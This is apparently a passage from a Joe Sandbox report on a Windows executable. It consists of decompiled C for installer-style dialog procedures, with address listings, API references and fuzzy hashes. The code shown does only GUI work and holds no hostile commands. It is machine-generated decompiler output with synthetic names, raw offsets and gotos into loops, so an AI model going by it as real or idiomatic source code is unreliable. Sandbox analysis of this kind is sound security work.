				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x7a8a88;
				_v28 =  *0x7a8a70 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x7a8a79 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404E31(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x7a8a78) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x7a1f2c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x7a1f40;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x7a1f2c = 0;
								 *0x7a1f40 = 0;
								 *0x7a8ac0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x7a8a79 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404EB1();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x7a1f40;
									_t201 =  *0x7a8a88;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x7a8a8c <= 0) {
										L86:
										if( *0x7a8b1e == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x7a7a3c + 0x10)) != 0) {
											E00404DEC(0x3ff, 0xfffffffb, E00404E04(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x7a8a8c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x7a1f40);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x7a8ac0 = _t291;
					 *0x7a1f40 = GlobalAlloc(0x40,  *0x7a8a8c << 2);
					_t258 = LoadImageW( *0x7a8a60, 0x6e, 0, 0, 0, 0);
					 *0x7a1f34 =  *0x7a1f34 | 0xffffffff;
					_t297 = _t258;
					 *0x7a1f3c = SetWindowLongW(_v8, 0xfffffffc, E004054F0);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x7a1f2c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x7a1f2c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E00406557(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E00404476(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E00404476(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x7a8a8c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x7a1f40 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x7a1f40 + _t300 * 4) = _t284;
									_v16 =  *( *0x7a1f40 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x7a8a8c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004044AB(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004044AB(_v12);
								L93:
								return E004044DD(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                                                                                              0x00404eea
                                                                                                                              0x00404f03
                                                                                                                              0x00404f08
                                                                                                                              0x00404f10
                                                                                                                              0x00404f16
                                                                                                                              0x00404f2c
                                                                                                                              0x00404f2f
                                                                                                                              0x0040515a
                                                                                                                              0x00405161
                                                                                                                              0x00405175
                                                                                                                              0x00405163
                                                                                                                              0x00405165
                                                                                                                              0x00405168
                                                                                                                              0x00405169
                                                                                                                              0x00405170
                                                                                                                              0x00405170
                                                                                                                              0x00405181
                                                                                                                              0x0040518f
                                                                                                                              0x00405192
                                                                                                                              0x004051a8
                                                                                                                              0x0040521d
                                                                                                                              0x00405220
                                                                                                                              0x00405222
                                                                                                                              0x0040522c
                                                                                                                              0x0040523a
                                                                                                                              0x0040523a
                                                                                                                              0x0040523c
                                                                                                                              0x00405246
                                                                                                                              0x0040524c
                                                                                                                              0x0040524f
                                                                                                                              0x00405252
                                                                                                                              0x0040526d
                                                                                                                              0x00405254
                                                                                                                              0x0040525e
                                                                                                                              0x0040525e
                                                                                                                              0x00405252
                                                                                                                              0x00405246
                                                                                                                              0x00000000
                                                                                                                              0x00405220
                                                                                                                              0x004051ad
                                                                                                                              0x004051b8
                                                                                                                              0x004051bd
                                                                                                                              0x004051c4
                                                                                                                              0x004051c9
                                                                                                                              0x004051cd
                                                                                                                              0x004051d8
                                                                                                                              0x004051d8
                                                                                                                              0x004051dc
                                                                                                                              0x004051e0
                                                                                                                              0x004051e4
                                                                                                                              0x004051f7
                                                                                                                              0x004051e6
                                                                                                                              0x004051e6
                                                                                                                              0x004051ed
                                                                                                                              0x004051f3
                                                                                                                              0x004051ef
                                                                                                                              0x004051ef
                                                                                                                              0x004051ef
                                                                                                                              0x004051ed
                                                                                                                              0x004051fb
                                                                                                                              0x004051fd
                                                                                                                              0x00405210
                                                                                                                              0x00405213
                                                                                                                              0x00405216
                                                                                                                              0x00405216
                                                                                                                              0x004051e0
                                                                                                                              0x00000000
                                                                                                                              0x004051cd
                                                                                                                              0x004051af
                                                                                                                              0x004051b6
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405270
                                                                                                                              0x00405270
                                                                                                                              0x00405277
                                                                                                                              0x004052e8
                                                                                                                              0x004052f0
                                                                                                                              0x004052f8
                                                                                                                              0x004052f8
                                                                                                                              0x00405301
                                                                                                                              0x00405303
                                                                                                                              0x0040530a
                                                                                                                              0x0040530d
                                                                                                                              0x0040530d
                                                                                                                              0x00405313
                                                                                                                              0x0040531a
                                                                                                                              0x0040531d
                                                                                                                              0x0040531d
                                                                                                                              0x00405323
                                                                                                                              0x00405329
                                                                                                                              0x0040532f
                                                                                                                              0x0040532f
                                                                                                                              0x0040533c
                                                                                                                              0x0040549d
                                                                                                                              0x004054a4
                                                                                                                              0x004054c1
                                                                                                                              0x004054c7
                                                                                                                              0x004054d9
                                                                                                                              0x004054d9
                                                                                                                              0x00000000
                                                                                                                              0x00405342
                                                                                                                              0x00405344
                                                                                                                              0x00405349
                                                                                                                              0x0040534e
                                                                                                                              0x00405353
                                                                                                                              0x00405355
                                                                                                                              0x00405355
                                                                                                                              0x00405356
                                                                                                                              0x00405357
                                                                                                                              0x00405359
                                                                                                                              0x00405359
                                                                                                                              0x00405361
                                                                                                                              0x004053a2
                                                                                                                              0x004053a4
                                                                                                                              0x004053b4
                                                                                                                              0x004053b7
                                                                                                                              0x004053bc
                                                                                                                              0x004053c3
                                                                                                                              0x004053c6
                                                                                                                              0x00405468
                                                                                                                              0x00405471
                                                                                                                              0x00405479
                                                                                                                              0x00405479
                                                                                                                              0x00405487
                                                                                                                              0x00405498
                                                                                                                              0x00405498
                                                                                                                              0x00000000
                                                                                                                              0x00405487
                                                                                                                              0x004053cc
                                                                                                                              0x004053cf
                                                                                                                              0x004053d5
                                                                                                                              0x004053da
                                                                                                                              0x004053dc
                                                                                                                              0x004053de
                                                                                                                              0x004053e4
                                                                                                                              0x004053eb
                                                                                                                              0x004053f0
                                                                                                                              0x004053f7
                                                                                                                              0x004053fa
                                                                                                                              0x004053fa
                                                                                                                              0x00405401
                                                                                                                              0x0040540d
                                                                                                                              0x00405411
                                                                                                                              0x00405413
                                                                                                                              0x00405413
                                                                                                                              0x00405403
                                                                                                                              0x00405405
                                                                                                                              0x00405405
                                                                                                                              0x00405433
                                                                                                                              0x0040543f
                                                                                                                              0x0040544e
                                                                                                                              0x0040544e
                                                                                                                              0x00405450
                                                                                                                              0x00405453
                                                                                                                              0x0040545c
                                                                                                                              0x00000000
                                                                                                                              0x00405363
                                                                                                                              0x0040536e
                                                                                                                              0x00405371
                                                                                                                              0x00405376
                                                                                                                              0x00405378
                                                                                                                              0x0040537c
                                                                                                                              0x0040538c
                                                                                                                              0x00405396
                                                                                                                              0x00405398
                                                                                                                              0x0040539b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040537e
                                                                                                                              0x0040537e
                                                                                                                              0x00405384
                                                                                                                              0x00405386
                                                                                                                              0x00405386
                                                                                                                              0x00405387
                                                                                                                              0x00405388
                                                                                                                              0x00000000
                                                                                                                              0x0040537e
                                                                                                                              0x00405361
                                                                                                                              0x0040533c
                                                                                                                              0x0040527f
                                                                                                                              0x00000000
                                                                                                                              0x00405295
                                                                                                                              0x0040529f
                                                                                                                              0x004052a4
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004052b6
                                                                                                                              0x004052bb
                                                                                                                              0x004052c7
                                                                                                                              0x004052c7
                                                                                                                              0x004052c9
                                                                                                                              0x004052d8
                                                                                                                              0x004052da
                                                                                                                              0x004052de
                                                                                                                              0x004052e1
                                                                                                                              0x00000000
                                                                                                                              0x004052e1
                                                                                                                              0x0040527f
                                                                                                                              0x00404f35
                                                                                                                              0x00404f3a
                                                                                                                              0x00404f43
                                                                                                                              0x00404f4a
                                                                                                                              0x00404f5c
                                                                                                                              0x00404f67
                                                                                                                              0x00404f6d
                                                                                                                              0x00404f7b
                                                                                                                              0x00404f8f
                                                                                                                              0x00404f94
                                                                                                                              0x00404fa1
                                                                                                                              0x00404fa6
                                                                                                                              0x00404fbc
                                                                                                                              0x00404fcd
                                                                                                                              0x00404fda
                                                                                                                              0x00404fda
                                                                                                                              0x00404fdd
                                                                                                                              0x00404fe3
                                                                                                                              0x00404fe5
                                                                                                                              0x00404fe8
                                                                                                                              0x00404fed
                                                                                                                              0x00404ff2
                                                                                                                              0x00404ff4
                                                                                                                              0x00404ff4
                                                                                                                              0x00405014
                                                                                                                              0x00405014
                                                                                                                              0x00405016
                                                                                                                              0x00405017
                                                                                                                              0x0040501c
                                                                                                                              0x00405022
                                                                                                                              0x00405026
                                                                                                                              0x0040502b
                                                                                                                              0x00405033
                                                                                                                              0x00405037
                                                                                                                              0x0040503c
                                                                                                                              0x00405041
                                                                                                                              0x00405049
                                                                                                                              0x0040504c
                                                                                                                              0x0040511c
                                                                                                                              0x0040512f
                                                                                                                              0x00000000
                                                                                                                              0x00405052
                                                                                                                              0x00405055
                                                                                                                              0x00405058
                                                                                                                              0x0040505b
                                                                                                                              0x0040505b
                                                                                                                              0x00405061
                                                                                                                              0x0040506a
                                                                                                                              0x0040506d
                                                                                                                              0x00405071
                                                                                                                              0x00405074
                                                                                                                              0x00405077
                                                                                                                              0x00405080
                                                                                                                              0x00405089
                                                                                                                              0x0040508c
                                                                                                                              0x0040508f
                                                                                                                              0x00405092
                                                                                                                              0x004050d0
                                                                                                                              0x004050fb
                                                                                                                              0x004050d2
                                                                                                                              0x004050e1
                                                                                                                              0x004050e1
                                                                                                                              0x00405094
                                                                                                                              0x00405097
                                                                                                                              0x004050a5
                                                                                                                              0x004050af
                                                                                                                              0x004050b7
                                                                                                                              0x004050be
                                                                                                                              0x004050c9
                                                                                                                              0x004050c9
                                                                                                                              0x00405092
                                                                                                                              0x00405101
                                                                                                                              0x00405102
                                                                                                                              0x0040510e
                                                                                                                              0x0040510e
                                                                                                                              0x0040511a
                                                                                                                              0x00405135
                                                                                                                              0x00405138
                                                                                                                              0x00405155
                                                                                                                              0x00000000
                                                                                                                              0x0040513a
                                                                                                                              0x0040513f
                                                                                                                              0x00405148
                                                                                                                              0x004054db
                                                                                                                              0x004054ed
                                                                                                                              0x004054ed
                                                                                                                              0x00405138
                                                                                                                              0x00000000
                                                                                                                              0x0040511a
                                                                                                                              0x0040504c

                                                                                                                              APIs
                                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404EFB
                                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404F06
                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F50
                                                                                                                              • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F67
                                                                                                                              • SetWindowLongW.USER32(?,000000FC,004054F0), ref: 00404F80
                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404F94
                                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FA6
                                                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404FBC
                                                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FC8
                                                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FDA
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00404FDD
                                                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405008
                                                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405014
                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050AF
                                                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 004050DF
                                                                                                                                • Part of subcall function 004044AB: SendMessageW.USER32(00000028,?,00000001,004042D6), ref: 004044B9
                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050F3
                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00405121
                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040512F
                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 0040513F
                                                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040523A
                                                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040529F
                                                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052B4
                                                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052D8
                                                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004052F8
                                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 0040530D
                                                                                                                              • GlobalFree.KERNEL32(?), ref: 0040531D
                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405396
                                                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040543F
                                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040544E
                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00405479
                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 004054C7
                                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 004054D2
                                                                                                                              • ShowWindow.USER32(00000000), ref: 004054D9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                              • String ID: $M$N
                                                                                                                              • API String ID: 2564846305-813528018
                                                                                                                              • Opcode ID: d16f015aa7e03b3a4c7b4e3c21f51a65bb20fb0afa08736e4432fb14da1321df
                                                                                                                              • Instruction ID: cd3a3d13ac431be8b4ce3887d4b4ed089ddf64e85d32bcda767c16d05f8e906a
                                                                                                                              • Opcode Fuzzy Hash: d16f015aa7e03b3a4c7b4e3c21f51a65bb20fb0afa08736e4432fb14da1321df
                                                                                                                              • Instruction Fuzzy Hash: 8D028B70900609AFDB20DFA5CC45EAF7BB5FB85314F10817AE610BA2E1DB798941DF58
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00404635 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 93%
                                                                                                                              			E00404635(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				intOrPtr _t69;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t108;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L13:
						__eflags = _a8 - 0x4e;
						if(_a8 != 0x4e) {
							__eflags = _a8 - 0x40b;
							if(_a8 == 0x40b) {
								 *0x79ff14 =  *0x79ff14 + 1;
								__eflags =  *0x79ff14;
							}
							L27:
							_t114 = _a16;
							L28:
							return E004044DD(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						__eflags =  *((intOrPtr*)(_t114 + 8)) - 0x70b;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b) {
							__eflags =  *((intOrPtr*)(_t114 + 0xc)) - 0x201;
							if( *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
								_t103 =  *((intOrPtr*)(_t114 + 0x1c));
								_t113 =  *((intOrPtr*)(_t114 + 0x18));
								_v12 = _t103;
								__eflags = _t103 - _t113 - 0x800;
								_v16 = _t113;
								_v8 = 0x7a6a00;
								if(_t103 - _t113 < 0x800) {
									SendMessageW(_t56, 0x44b, 0,  &_v16);
									SetCursor(LoadCursorW(0, 0x7f02));
									_push(1);
									E004048E4(_a4, _v8);
									SetCursor(LoadCursorW(0, 0x7f00));
									_t114 = _a16;
								}
							}
						}
						__eflags =  *((intOrPtr*)(_t114 + 8)) - 0x700;
						if( *((intOrPtr*)(_t114 + 8)) != 0x700) {
							goto L28;
						} else {
							__eflags =  *((intOrPtr*)(_t114 + 0xc)) - 0x100;
							if( *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
								goto L28;
							}
							__eflags =  *((intOrPtr*)(_t114 + 0x10)) - 0xd;
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x7a8a68, 0x111, 1, 0);
							}
							__eflags =  *((intOrPtr*)(_t114 + 0x10)) - 0x1b;
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x7a8a68, 0x10, 0, 0);
							}
							return 1;
						}
					}
					__eflags = _a12 >> 0x10;
					if(_a12 >> 0x10 != 0) {
						goto L27;
					}
					__eflags =  *0x79ff14; // 0x0
					if(__eflags != 0) {
						goto L27;
					}
					_t69 =  *0x7a0f20; // 0x8e3734
					_t29 = _t69 + 0x14; // 0x8e3748
					_t116 = _t29;
					__eflags =  *_t116 & 0x00000020;
					if(( *_t116 & 0x00000020) == 0) {
						goto L27;
					}
					_t108 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
					__eflags = _t108;
					 *_t116 = _t108;
					E00404498(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
					E004048C0();
					goto L13;
				} else {
					_t117 = _a16;
					_t75 =  *(_t117 + 0x30);
					if(_t75 < 0) {
						_t75 =  *( *0x7a7a3c - 4 + _t75 * 4);
					}
					_t76 =  *0x7a8a98 + _t75 * 2;
					_t110 =  *_t76 & 0x0000ffff;
					_a8 = _t110;
					_t78 =  &(_t76[1]);
					_a16 = _t78;
					_v16 = _t78;
					_v12 = 0;
					_v8 = E004045E6;
					if(_t110 != 2) {
						_v8 = E004045AC;
					}
					_push( *((intOrPtr*)(_t117 + 0x34)));
					_push(0x22);
					E00404476(_a4);
					_push( *((intOrPtr*)(_t117 + 0x38)));
					_push(0x23);
					E00404476(_a4);
					CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
					E00404498( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
					_t118 = GetDlgItem(_a4, 0x3e8);
					E004044AB(_t118);
					SendMessageW(_t118, 0x45b, 1, 0);
					_t92 =  *( *0x7a8a70 + 0x68);
					if(_t92 < 0) {
						_t92 = GetSysColor( ~_t92);
					}
					SendMessageW(_t118, 0x443, 0, _t92);
					SendMessageW(_t118, 0x445, 0, 0x4010000);
					SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
					 *0x79ff14 = 0;
					SendMessageW(_t118, 0x449, _a8,  &_v16);
					 *0x79ff14 = 0;
					return 0;
				}
			}




















                                                                                                                              0x00404647
                                                                                                                              0x00404767
                                                                                                                              0x00404774
                                                                                                                              0x004047d1
                                                                                                                              0x004047d1
                                                                                                                              0x004047d5
                                                                                                                              0x0040489b
                                                                                                                              0x004048a2
                                                                                                                              0x004048a4
                                                                                                                              0x004048a4
                                                                                                                              0x004048a4
                                                                                                                              0x004048aa
                                                                                                                              0x004048aa
                                                                                                                              0x004048ad
                                                                                                                              0x00000000
                                                                                                                              0x004048b4
                                                                                                                              0x004047e3
                                                                                                                              0x004047e9
                                                                                                                              0x004047ec
                                                                                                                              0x004047f3
                                                                                                                              0x004047f5
                                                                                                                              0x004047fc
                                                                                                                              0x004047fe
                                                                                                                              0x00404801
                                                                                                                              0x00404804
                                                                                                                              0x00404809
                                                                                                                              0x0040480f
                                                                                                                              0x00404812
                                                                                                                              0x00404819
                                                                                                                              0x00404826
                                                                                                                              0x00404837
                                                                                                                              0x0040483d
                                                                                                                              0x00404845
                                                                                                                              0x00404853
                                                                                                                              0x00404859
                                                                                                                              0x00404859
                                                                                                                              0x00404819
                                                                                                                              0x004047fc
                                                                                                                              0x0040485c
                                                                                                                              0x00404863
                                                                                                                              0x00000000
                                                                                                                              0x00404865
                                                                                                                              0x00404865
                                                                                                                              0x0040486c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040486e
                                                                                                                              0x00404872
                                                                                                                              0x00404882
                                                                                                                              0x00404882
                                                                                                                              0x00404884
                                                                                                                              0x00404888
                                                                                                                              0x00404894
                                                                                                                              0x00404894
                                                                                                                              0x00000000
